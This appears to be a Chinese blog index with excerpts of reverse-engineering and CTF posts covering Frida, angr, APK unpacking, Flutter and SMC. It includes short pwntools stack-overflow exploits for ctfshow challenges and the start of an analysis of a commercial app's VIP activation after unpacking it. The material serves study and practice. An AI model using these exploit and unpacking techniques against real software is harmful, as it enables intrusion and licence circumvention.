qiling-labs练习参考Hijack - Qiling Framework Documentation QilingLab Quickstart - Autumnal 屏蔽器 - QilingLab – 发布 ‍ 环境搭建12345pip install qilinggit clone https://github.com/qilingframework/qiling.gitcd qilinggit submodule update --init --recursivepip install . ‍ 基础模板1234567891011from qiling import *def challenge1(ql: Qiling): passif __name__ == '__main__': path = ['qilinglab-x86_64'] # 我们的目标 rootfs = "./qiling/examples/rootfs/x8664_linux" # 在你clone下来的仓库里 ql = ...

你知道base吗 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051#include <stdio.h>#include <stdint.h> void encrypt (uint32_t* v, uint32_t* k) { uint32_t v0=v[0], v1=v[1], sum=0, i; uint32_t delta=0x9e3779b9; uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; for (i=0; i < 32; i++) { sum += delta; v0 += ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1); v1 += ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0&g ...

lit的时候忙其他的去了只能含泪复现 rc4的附件不知道丢哪了 整体的难度还行 FeatureExtraction 将我们的输入处理为32位 发现到key 进入加密函数观察加密流程 搞到密文 理解加密流程 解密就简单了 123456789101112131415161718key = [0x4C, 0x69, 0x74, 0x43, 0x54, 0x46, 0x32, 0x30, 0x32, 0x35]enc = [0x1690, 0x3E58, 0x6FF1, 0x86F0, 0x9D66, 0xAB30, 0xCA71, 0xCF29, 0xE335, 0xE492, 0xF1FD, 0xDE80, 0xD0C8, 0xC235, 0xB9B5, 0xB1CF, 0x9E9F, 0x9E86, 0x96B4, 0xA550, 0xA0D3, 0xA135, 0x99CA, 0xACC0, 0xBE78, 0xC196, 0xBC00, 0xB5C3, 0xB7F0, 0xB465, 0xB673, 0xB71F, 0xB ...

简单的小爬虫acfun1234567891011121314151617181920212223242526#抖音等短视频会将完整的视频进行切割导致我们需要一次性下载多个内容import requestsfrom moviepy import *headers={'user-agent':"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"}num=0while True: video_num="{:05d}".format(num) url = f"https://ali-safety-video.acfun.cn/mediacloud/acfun/acfun_video/0ab61fa7d4eba429-670fa7db61f7931de917554be349ce ...

CTF+Binary练习题-Re-Day4 判断输入是否为数字 这里就是核心代码 这里 搞到了 这里截图截错了 应该再往上搞一位 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586def solve_sudoku(grid): # Find an empty cell (with value 0) for i in range(9): for j in range(9): if grid[i][j] == 0: # Try all possible numbers for num in range(1, 10): if is_valid(grid, i, j, nu ...

ctfshow刷题wp栈溢出pwn36 12345678from pwn import *p = process('./pwn')# p = remote('pwn.challenge.ctf.show', 28250)payload = cyclic(0x28+4) + p32(0x8048586)p.sendline(payload)p.interactive() ‍ pwn37 1234567891011from pwn import *p = process('./pwn')# p = remote('pwn.challenge.ctf.show', 28250)get_flag = 0x08048521payload = cyclic(0x12 + 0x4) + p32(get_flag)p.sendline(payload)p.interactive() ‍ pwn38涉及到了栈对齐 123456789101112131415from pwn import *p = process(&#x ...

flutterpro参考https://github.com/worawit/blutter Android-Flutter逆向 | LLeaves Blog [原创]flutter逆向 ACTF native app-Android安全-看雪-安全社区|安全招聘|kanxue.com 吾爱破解安卓逆向入门教程《安卓逆向这档事》番外实战篇3-拨云见日之浅谈Flutter逆向_哔哩哔哩_bilibili ‍ 123git clone https://github.com/worawit/blutter --depth=1cd .\blutter\python .\scripts\init_env_win.py 初始化一下 然后讲libapp和libflutter丢进新建的文件夹方便查找 1python .\blutter.py ..\chall\lib\arm64-v8a\ .\output 最后会得到这些内容 其中的ida_script就可以用来恢复libapp的符号 js则是实例的frida模板 可以看到在没还原之前都是一坨 使用了脚本以后就好了很多 ‍ flutter ...

dumpdexxyctf的trustme 加壳 使用frida-dexdump实现脱壳 1frida-dexdump -U -f com.swdd.trustme

参考资料[原创]Android加壳脱壳学习（1）——动态加载和类加载机制详解-Android安全-看雪-安全社区|安全招聘|kanxue.com 类加载器Android中的类加载器机制与JVM一样遵循双亲委派模式 双亲委派模式1.加载.class文件的时候，以递归的的形式逐级向上委托给父加载器ParentClassLoader去加载,如果加载过了,就不用在加载一遍 2.如果父加载器也没加载过,则继续委托给父加载器去加载,一直到这条链路的顶级,顶级classLoader判断如果没加载过,则尝试加载,加载失败,则逐级向下交还调用者来加载. 123456789101112131415161718192021protected Class<?> loadClass(String name, boolean resolve) throws ClassNotFoundException{ //1.先检查是否已经加载过--findLoaded Class<?> c = findLoadedClass(name); ...

reASM?Signin!ai 一把梭 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748#!/usr/bin/env python3# Final DATA1 array after the DO1/DO2 swapping (32 bytes)final_data1 = [ 0x26, 0x27, 0x24, 0x25, 0x3F, 0x27, 0x34, 0x11, 0x32, 0x33, 0x30, 0x00, 0x36, 0x37, 0x34, 0x35, 0x3A, 0x3B, 0x38, 0x39, 0x3E, 0x3F, 0x3C, 0x3D, 0x2A, 0x2B, 0x28, 0x00, 0x2E, 0x2F, 0x2C, 0x2D]# DATA2 array that the encrypted flag is compared with (32 bytes)data2 = [ 0x69, ...

链接Release v1.12.2 · luoyesiqiu/dpt-shell 很有意思的项目 我就试了fart可以成功 使用方法1java -jar dpt.jar -f 3.apk 效果 使用后 脱壳frida-dexdump 小黑盒失败 dumpdex失败

前言速刷一下angr 学习一下较为浅薄层面的angr应用 基础脚本12345678910111213141516171819202122232425262728293031323334353637import angrimport sysdef Go(): path_to_binary = "angr2" project = angr.Project(path_to_binary, auto_load_libs=False)#创建实例 initial_state = project.factory.entry_state()#得到程序的入口 simulation = project.factory.simgr(initial_state)#创建仿真模拟器负责管理程序运行的路径 print(project.arch)#输出框架 print(hex(project.entry))#入口 print(project.filename)#路径 def is_successful(initial_state): ...

参考Android so层逆向分析入门 - Curz0n’s Blog Android脱壳工具整理_apk脱壳工具-CSDN博客 ida为9版本 so分析静态注册的方法可以直接在导出表查询到 动态注册则是需要查看jni_onload函数进行分析 stringFromJNI为静态注册 test方法为动态注册 jni_onload第一个参数的类型是JavaVM* 面对错误可以手动修复 动态注册流程 123456789101112131415161718//第一步，实现JNI_OnLoad方法JNIEXPORT jint JNI_OnLoad(JavaVM* jvm, void* reserved){ //第二步，获取JNIEnv JNIEnv* env = NULL; if(jvm->GetEnv((void**)&env, JNI_VERSION_1_6) != JNI_OK){ return JNI_FALSE; } //第三步，获取注册方法所在Java类的引用 jclass clazz ...

参考资料[原创]基于 Frida 对单字节加密验证程序侧信道爆破-CTF对抗-看雪-安全社区|安全招聘|kanxue.com 应用场景面对一些单次较短字节的比较验证场景，例如vm等 原理通过frida插桩获取到比较正确的计数器进行反馈实现爆破 简单代码1234567891011121314151617181920212223#include<iostream>#include<stdlib.h>using namespace std;typedef int status;typedef int selemtype;#include<windows.h>char flag[] = "flag{12321213}";char w[] = "Wrong!";char r[] = "Right!"; int main (){ char input[256] = {0}; gets(input); for(in ...

FastAndFrustratingaot 之前闻所未闻的东西 运行 直接退出了 有检测 只要的函数位置 这里就是检测的 这个是检测系统语言的 很明显是有问题的 修改一下转跳 这两段就是终端的回显 这里获取输入 随便搞点输入 报错了根据信息有个frombase64的解码 跟进调试一手 这里就是报错的地方 这里报错的原因就是 这里是判断base后面的== 但是数据是不对的 毕竟fake就写在那 只能去字符串里面搞 可以看到这里是进行base以后还有个gzip和json反序列化 难绷 现在要去找正确的字符串进行base解码 就这个像点 1{"mat_a": [[1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 2, -1, 0, -2, 4, -12, 16, 2, -21, -29, 11, -37, 3, 104, 64, 192], [0, 1, 1, 0, 2, 1, 1, 1, -1, 3, -1, -1, -1, 0, -3, 0, -6, 18, 6, -23, -25, 3, -21 ...

obfusheader.h去除花指令 由于太多了直接使用脚本 一键处理 123456789startaddr = 0x7FF6E76C1000endaddr = 0x7FF6E76f5000//text段for i in range(startaddr, endaddr): if get_wide_byte(i) == 0x74: if get_wide_byte(i + 2) == 0x0: patch_byte((i + 2), 0x90) print("[+] Addr {} is patched".format(hex(i + 2))) 直接字符串查找定位 启动调试 输入长度为0x28 1aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 打上读写断点 直接f9 第一次到了这里计算了长度 这里进行xor 提取也简单 拿加密完成的和明文xor一下就行 再次f9 高低位呼唤加取反 再次f9到了这里就是密文 123456789101 ...

frida for windows参考Frida-Windows 夏洛魂的个人博客 JavaScript API | Frida • A world-class dynamic instrumentation toolkit 12345678910111213#include<stdio.h>#include<stdint.h>int add(int a,int b){ return a+b;}int main(){ int a=6; int b=7; printf("%d",add(a,b));} 很简单的测试脚本 挨个把官方文档的api都试一试 搞一个开发环境 123git clone https://github.com/oleavr/frida-agent-example.git cd frida-agent-example/ npm install 网速慢就直接 1git config --global http.proxy http://127.0.0.1:78 ...

前言最近学了点frida-windows想到了litctf最后一道题可以主动调用来获取flag 但大多是用的ce 我突发奇想试试frida 水一下 前置内容省略了 大体的思路就是主动调用 1234567891011121314151617181920212223242526272829303132333435363738394041424344var baseaddres =Process.findModuleByName("GameAssembly.dll")console.log(baseaddres);const RobbieGetFlag = new NativeFunction( baseaddres.base.add(0x7A52A0), 'int64', // __int64 返回类型 [] // 无参);try { // 调用函数 const result = RobbieGetFlag(); // 将返回的int64转换为字符串 // 方法1：直接显示 ...

x1Login1234567891011private final void checkSecutity() { if (Secure.checkDebug()) { Toast.makeText(this, "Debugger Detected!", 0).show(); exit(); } if (Secure.checkRoot()) { Toast.makeText(this, "Root Detected!", 0).show(); exit(); } } 上来就是root的检测和调试的检测 好在java层 不然要炸缸 mt管理器去除一下调用就行 接着看 查看so 直接上frida看看怎么个事 1234567891011 Java.perform(function (){ let DecStr = Java.use(& ...

参考Unidbg 的基本使用（二） hookfrida进入jadx 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091package com.sina.weibo.security;import android.util.Base64;import java.io.ByteArrayOutputStream;import java.security.Key;import java.security.KeyFactory;import java.security.PublicKey;import java.security.spec.X509EncodedKeySpec;import javax.crypto.Cipher;/* loaded from: classes.dex */public ...

修改cpython源码实现插桩参考2024 Ciscn长城杯铁人三项 逆向题Cython_[长城杯 2024]cython-CSDN博客 编译1git checkout 3.11 修改要的版本 直接执行 第一次就是有点慢 ‍ ‍ ‍ ‍ 修改目标E:\cpython\Objects\abstract.c 测试样例就是ciscn2024的cython题 12345678910111213141516171819import ez flag = "a"*24flag1 = list(flag)value = []b = 0ck = 0if len(flag1) == 24: for i in range(0,len(flag1),4): b = ord(flag1[i]) << 24 | ord(flag1[i+1]) << 6 | ord(flag1[i+2]) << 8 | ord(flag1[i+3]) value.append(b) key = [102, 108, 97, 103]flag_encrypt = [] ...

参考文档探究SMC局部代码加密技术以及在CTF中的运用 – Sw’Blog SHangwendada/CodeRepo: 这是SWDD的逆向技术实现代码存储仓库~ http://gdufs-king.github.io/2020/05/22/smc%E5%8A%A0%E5%AF%86%E7%A0%94%E7%A9%B6/ https://bbs.kanxue.com/thread-263816-1.htm 原理SMC，即Self Modifying Code，动态代码加密技术，指通过修改代码或数据，阻止别人直接静态分析，然后在动态运行程序时对代码进行解密，达到程序正常运行的效果，而计算机病毒通常也会采用SMC技术动态修改内存中的可执行代码来达到变形或对代码加密的目的，从而躲过杀毒软件的查杀或者迷惑反病毒工作者对代码进行分析。通常来说，SMC使用汇编去写会比较好，因为它涉及更改机器码，但SMC也可以直接通过C、C++来实现。 简单代码123456789101112131415#include<stdio.h>#include<stdint.h>void ...

文件识别 第一个是布局文件 java文件 工程项目结构project下有多个模块 projectappmanifests内有俺的日哦的manifest.xml文件 andriod的运行配置文件 java下面有三个com.example.myapp包 第一个存放当前模块的java源代码 后两个存放测试的java代码 resdrawable存放图形描述文件和图片文件 layout存放app页面的布局文件 mipmap存放app的启动图标 values目录存放常量定义文件 字符串常量strings.xml 像素常量dimens.xml等 gradle scriptibuild.gradle proguard-rules.pro gradle.properties settings.gradle local.properties 创建activitylayout下创建xml文件创建相关的javadiamagnetic 在andriodmainfest.xml注册页面配置 123456789101112<?xml version="1.0" encoding=&q ...

l3hctf参考Tauri 框架的静态资源提取方法探究 | yllhwa's blog oacia/stalker_trace_so: 一个IDA插件，利用frida-stalker在加载so时打印出所有函数调用，解决frida-trace无法在so加载时trace的问题 frida-stalker-trace 使用并实战某音 | mgaic ‍ ‍ ‍ ‍ ez_android一开始想拿插件去trace的但是崩溃了 但是这个题不用trace也能做 tauriactivity的app 解包静态资源 分别对应文件名及其长度 文件内容及其长度 1234567891011121314151617181920212223242526272829303132333435363738394041424344import osimport brotliaddr = 0xC9498 # 这里的地址是压缩内容的地址endadd = 0xC9498+0xebdump = [0] * (endadd - addr)for i in range(addr, endadd): d ...

某apk简单分析看到一些师傅有破解的文章遂想自己独立尝试 有加固 尝试脱壳机 ok啊 搞出来了 jeb打开 研究一下vip的获取方式 可以使用激活码 抓包看一眼 使用reqable进行抓包 响应 去dex中查找一下内容 查找一下字符串 ‍ 在这里查找一下关于网络的方法 可以找得到关于发送的请求头 ‍ 接下来去寻找一下解析响应的方法 找个方法交叉引用一下 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107package com.itally.base.data;import android.text.TextUtils;import com.alibaba.fastjson.n;import com ...

思源笔记同步参考思源使用阿里云 OSS 同步详细教程 - YangHgRi 的回帖 - 链滴 阿里云oss 选择bucket列表 创建 记录Endpoint oss-cn-beijing.aliyuncs.com 选择accesskey 创建用户记录key 赋予权限 再在bucket列表中赋予完全控制权限 回到思源 这里看你的订阅状态 我这里先拿试用做实验 来到云端 填入对应的信息 选择密码生成密钥 就完成了 ‍

声明这篇文章纯纯就是水 环境配置adb 不同版本ida的android_server 真机或者模拟器 流程解压获取so文件 安装apk 启动android server 启动ddms 一般sdk目录下面就有 找到对应的进程 ida打开对应的so 断点 也可以ctrl+f7找到对应的内容 adb进入adb shell 启动android server 如果要进行一些端口的选择可以 1./as -p[端口] adb 端口转发 1adb forward tcp:23946 tcp:23946 adb启动应用 1adb shell am start -D -n [apk包名]/[主活动] ida附加 选择进程 附加 cmd port可以在monitor找到 1jdb -connect com.sun.jdi.SocketAttach:hostname=127.0.0.1,port=8600 wait for debug就没了 这里建议真机调 因为我模拟器 断点老是出问题

参考Unidbg 的基本使用（一） 下载源码zhkl0228/unidbg: Allows you to emulate an Android native library, and an experimental iOS emulation 项目结构1234567891011121314151617181920212223242526272829303132├── README.md # 项目介绍和使用指南├── LICENSE # 开源许可证文件├── .gitignore # Git 忽略文件配置├── pom.xml # Maven 配置文件，定义了项目的依赖和构建配置├── mvnw # 脚本文件，用于 Maven Wrapper (Linux/Mac)├── mvnw.cmd # 脚本文件，用于 Maven W ...